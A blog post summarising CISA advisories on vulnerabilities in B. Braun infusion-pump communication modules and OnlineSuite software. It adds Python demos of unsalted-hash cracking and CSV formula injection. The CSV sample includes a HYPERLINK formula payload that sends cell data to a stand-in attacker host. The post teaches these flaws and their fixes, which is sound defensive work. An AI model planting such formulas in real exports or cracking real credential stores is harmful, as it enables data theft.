Today the CISA NCCIC-ICS published two medical device
security advisories for products from B. Braun Melsungen AG.

SpaceCom Advisory

This advisory describes
eleven vulnerabilities in the B. Braun SpaceCom, Battery Pack SP with Wi-Fi,
and Data module compactplus products. The vulnerabilities were reported by Julian
Suleder, Nils Emmerich, and Birk Kauer of ERNW Research, and Dr. Oliver Matula
of ERNW Enno Rey Netzwerke via the German Federal Office for Information
Security (BSI). B. Braun has updates that mitigate the vulnerabilities. There
is no indication that the researchers have been provided an opportunity to
verify the efficacy of the fix.

The eleven reported vulnerabilities are:

• Cross-site scripting – CVE-2020-25158,

• Open redirect – CVE-2020-25154,

• XPath injection – CVE-2020-25162,

• Session fixation – CVE-2020-25152,

• Use of one-way hash without a salt – CVE-2020-25164,

• Relative path traversal – CVE-2020-25150,

• Improper verification of cryptographic signature – CVE-2020-25166,

• Improper privilege management – CVE-2020-16238,

• Use of hard-coded credentials – CVE-2020-25168,

• Active debug code – CVE-2020-25156, and

• Improper access control – CVE-2020-25160.
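As an added illustration of the "use of one-way hash without a salt" class in the list above (example code written for this post, not B. Braun firmware and not the researchers' findings): the weak pattern lets an attacker crack every stored credential with one precomputed table, while a per-record random salt and a slow key derivation function defeat that. The password list, iteration count and storage format are assumptions of the example.

```python
import hashlib
import hmac
import os
from typing import Optional

# Work factor for PBKDF2-HMAC-SHA256. Assumption for this demo; tune for the target hardware.
ITERATIONS = 200_000

# Constructed sample of a tiny lookup table an attacker could precompute once and
# reuse against every unsalted credential store (the passwords are invented here).
COMMON_PASSWORDS = ["123456", "password", "admin123", "service2020"]


def unsalted_hash(password: str) -> str:
    """The weakness: a bare one-way hash. Identical passwords always give identical
    digests, so one precomputed table cracks every user on every device at once."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def precomputed_table(passwords) -> dict:
    """Attacker side: map unsalted digest -> password for a candidate list."""
    return {unsalted_hash(p): p for p in passwords}


def crack_unsalted(stored_digest: str, table: dict) -> Optional[str]:
    """A single dictionary lookup recovers the password; no hashing at attack time."""
    return table.get(stored_digest)


def salted_hash(password: str, salt: Optional[bytes] = None) -> str:
    """The fix: a per-record random salt plus a slow KDF. Stored as salt$iters$digest
    (the storage format is an assumption of this example)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"{salt.hex()}${ITERATIONS}${digest.hex()}"


def verify_salted(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    salt_hex, iters, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    table = precomputed_table(COMMON_PASSWORDS)
    weak = unsalted_hash("admin123")
    print("unsalted digest cracked from table:", crack_unsalted(weak, table))
    strong = salted_hash("admin123")
    print("salted record:", strong)
    print("verify correct password:", verify_salted("admin123", strong))
    print("verify wrong password:", verify_salted("admin124", strong))
```

Two salted records for the same password never match, so a table built against one device is useless against the next; the iteration count is stored with the record so it can be raised later without invalidating existing credentials.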

NCCIC-ICS reports that a relatively low-skilled attacker
could remotely exploit these vulnerabilities to compromise the Space or
compactplus communication devices, escalate privileges, view sensitive
information, upload arbitrary files, and perform remote code execution.

OnlineSuite Advisory

This advisory
describes three vulnerabilities in the B. Braun OnlineSuite product. The
vulnerabilities were reported by the same researchers mentioned in the first
advisory. B. Braun has an update that mitigates the vulnerabilities. There is
no indication that the researchers have been provided an opportunity to verify
the efficacy of the fix.

The three reported vulnerabilities are:

• Relative path traversal – CVE-2020-25172,

• Uncontrolled search path element – CVE-2020-25174,

• Improper neutralization of formula elements in a CSV file – CVE-2020-25170.
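As an added illustration of the "improper neutralization of formula elements in a CSV file" class listed above (example code written for this post, not B. Braun OnlineSuite code): a CSV export that copies user-supplied fields verbatim lets a value beginning with `=`, `+`, `-`, `@`, tab or carriage return run as a formula when the file is opened in a spreadsheet. The example shows the vulnerable export beside one that neutralizes such cells. The column names, payload and host name are constructed for the example.

```python
import csv
import io

# Leading characters that Excel, LibreOffice and Google Sheets interpret as the
# start of a formula (or a DDE/hyperlink trigger) when a CSV is opened.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export. The "device label" fields are attacker-controlled
# input as it might arrive from a network-facing form; payload and host are invented.
SAMPLE_ROWS = [
    ["device label", "pump serial", "flow rate"],
    ['=HYPERLINK("http://attacker.example/?"&B2,"open log")', "SN-0001", "-12.5"],
    ["Ward 3 pump", "SN-0002", "+1"],
    ["@SUM(1+1)", "SN-0003", "7"],
]


def _is_plain_number(value: str) -> bool:
    """Negative and explicitly signed numbers legitimately start with '-' or '+';
    leave those alone so the export stays usable."""
    try:
        float(value)
        return True
    except ValueError:
        return False


def neutralize_cell(value):
    """Prefix a cell with a single quote when it starts with a formula trigger.
    Spreadsheets then treat the content as literal text."""
    if not isinstance(value, str):
        return value
    if value.startswith(FORMULA_TRIGGERS) and not _is_plain_number(value):
        return "'" + value
    return value


def export_csv(rows, neutralize=True) -> str:
    """neutralize=False reproduces the vulnerable pattern: user input copied verbatim.
    Every field is quoted so embedded commas, quotes and newlines cannot break the
    row structure either (that alone does not stop formula execution)."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) if neutralize else c for c in row])
    return buf.getvalue()


if __name__ == "__main__":
    print("--- vulnerable export ---")
    print(export_csv(SAMPLE_ROWS, neutralize=False))
    print("--- neutralized export ---")
    print(export_csv(SAMPLE_ROWS))
```

The quote prefix is a mitigation on the output side only; the exact rendering of the leading quote varies between spreadsheet applications, and the signed-number exception is a usability trade-off that should be reviewed for the data actually being exported. Validating the fields at input time, where the form is accepted, is still the stronger control.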

NCCIC-ICS reports that a relatively low-skilled attacker
could remotely exploit these vulnerabilities to escalate privileges, download
and upload arbitrary files, and perform remote code execution.

NOTE: Neither of the company advisories is listed on the US web site
for B. Braun.

By admin